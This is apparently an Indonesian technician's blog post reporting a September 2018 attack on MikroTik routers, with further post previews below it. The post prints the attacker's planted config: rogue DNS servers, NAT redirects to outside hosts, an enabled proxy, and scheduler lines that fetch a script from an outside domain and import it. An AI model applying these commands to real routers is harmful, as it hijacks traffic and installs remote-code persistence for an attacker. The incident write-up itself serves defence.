Langsung ke konten utama

Mikrotik : Wabah september 2018

email : ariyaandro@gmail.com


belum genap 3 bulan penulis membahas impact serangan mikrotik kapan lalu di link berikut

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

Mikrotik : Wabah Oktober 2018

sudah ada yang lain yang belum jelas serangan seperti apa ini, yang jelas mem block koneksi IP public kembali dan mengisolasi akses dari beberapa IP. untungnya login mikrotik tidak di tutup total masih mau login via mac address antar mikrotik.

berikut beberapa capture config yang di obrak-abrik wabah mikrotik, yang belum sempat cek script config satu-satu… hehehhehhe

serangan pertama pertengahan september, tak diketahui apakah di sumber yang sama atau bagimana. ada pergerakan filter firewall yang aneh. akses ippublic terhalagi, untuk via MAC address masih bisa.

serengan berlanjut di akhir bulan september, yang semakin brutal hingga membuat script dan upload download ke link tak jelas arah lintang nya. dan yang ini tak tahu juga apah dari sumber yang sama di serangaan sebelumnnya.

ini baru sempat ngoprek config mana saja yang di sasar,.. berikut hasilnya :


/ip dns
set servers=”94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.20\
8.208.141″

/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
src-address-list=!Ok to-ports=8080
add action=redirect chain=dstnat comment=sysadminproxy disabled=yes dst-port=\
80 protocol=tcp src-address-list=!Ok to-ports=8080
add action=dst-nat chain=dst-nat disabled=yes dst-port=3333 protocol=tcp \
to-addresses=149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat disabled=yes dst-port=8888 protocol=tcp \
to-addresses=149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat disabled=yes dst-port=14444 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat disabled=yes dst-port=8008 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat disabled=yes dst-port=4444 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444

/ip proxy
set enabled=yes

/ip proxy access
add action=deny comment=sysadminpxy

/system note
set note=”DEVICE HACKED – ACCOUNT ftp HAD UNSAFE PASSWORD”

/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235


sedangkan pada menu file disk mikrotik ada file aneh berikut

yang salah satunya yaitu mikrotik.php dengan isi berikut

:do { /system scheduler set U3 name=”U5″ on-event=”/tool fetch url=http://ciskotik.com/poll/b8c07b87-7239-4acd-8012-92e7 mode=http dst-path=7xe7z\r\n/import 7xe7z” } on-error={ :put “U3 not found”}

:do { /system scheduler set U4 name=”U5″ on-event=”/tool fetch url=http://ciskotik.com/poll/b8c07b87-7239-4acd-8012-92e7 mode=http dst-path=7xe7z\r\n/import 7xe7z” } on-error={ :put “U4 not found”}

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Komentar

Postingan populer dari blog ini

Review Laptop : Lenovo ThinkPad X250 i5-5300u Series - 2021

Klik gambar untuk kontak via WhatsApp IG : https://www.instagram.com/linktech_cctv/ Klik gambar untuk menuju website email : ariyaandro@gmail.com POSTING 860 lanjut mimin juga dapat kesempatan cek seri x250 yang ditenagai i5 gen 5 series 5300u, yang dimana tulisan sebelumnya mengulas kakaknya yaitu series 5200u yang menarik juga. awal unbox ada sedikit permasalahan di Fan CPU dalam, sehingga awal menyalakan laptop ini warning FAN dan laptop langsung mati tidak bisa lanjut boot. https://pmdkduaonline.files.wordpress.com/2021/07/wp-1626745653642..mp4 *semua gambar/foto perangkat akan dikaburkan untuk keamanan privasi tampak depan sebelum cek FAN bagian dalam penampakan awal bongkar case laptop terlihat bercak debu-debu cantik lubang kisi-kisi pembuangan aman tak tampak debu yang menggumpal penampakan setelah dibersihkan sudah lebih baik dan FAN bisa berputar kembali dengan baik akhirnya bisa menyala dengan baik penampakan awal BIOS Fitur BIOS yang ada berikut sebagian fitur BIOS yang sem...

Troubleshoot : Cek dan Menurunkan Beban CPU Mikrotik karena SPI Service

email : ariyaandro@gmail.com POSTING 813 kapan lalu mimin mengalami kendala jaringan yang sedikit melemah dan ternyata ada gangguan load CPU pada mikrotik seri 2011UiAS-2HnD, lanjut gunakan tutorial berikut untuk menemukan dugaan yang ada Cara Mengetahui Proses yang Menyebabkan CPU Usage Tinggi di Mikrotik akhirnya terpantau CPU tinggi walau kondisi idle di luar jam kerja di beberapa minggu trakhir dengan rerata CPU load hampir 50 %, pertama untuk meastikan disable atau hapus rule yang tak terlalu wajib utk sementara. namun kendala CPU load cukup tinggi, dugaan rentang sekitar 2 minggu trakhir ada update OS itu yang mengakibatkan ada bug yang berimbas ke service SPI. dikarenakan router yang sama di lokasi berbeda dengan OS update yang sama dengan rule yang hampir sama jumlah aktifnya tidak mengalami load cukup tinggi. Cara Memperkecil Load CPU Mikrotik hasil pengecekan tool-profile ternyata service SPI yang sedang bermasalah memakan resource cukup tinggi dan merepotkan traffic jaringan...

Mikrotik : Wabah Setahun 2018-2019 yang masih eksis

email : ariyaandro@gmail.com Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia Mikrotik : Wabah september 2018 Mikrotik : Wabah Oktober 2018 Mikrotik : Wabah November 2018 Mikrotik : Wabah Januari 2019 dari daftar postingan yang termuat, sepertinya bug mikrotik dalam versi yang lebih lama dalam setahun ini masih ada yang menggunakannya. dimana bulan ini serangannya mirip dengan sebelumnnya yaitu melakukan seranga bertahap dari menyisipkan rule pada firewall, note bitcoin, membuat port NAT, mengaktifkan proxy, edit port service mikrotik dan lainnya. berikut capture serangan yang terjadi penyisipan file html ke storage mikrotik crate user baru dalam mikrotik membuat rule yang lebih banyak dari sebelumnnya dan cirihas bitcoin sertw webmoney berikut potongan code setting yang di sisipi,… syukur login utama belum terkunci… #apr/26/2019 10:29:32 by RouterOS 6.39.2 /system logging action set 1 disk-file-name=log /ip firewall address-list add address=10...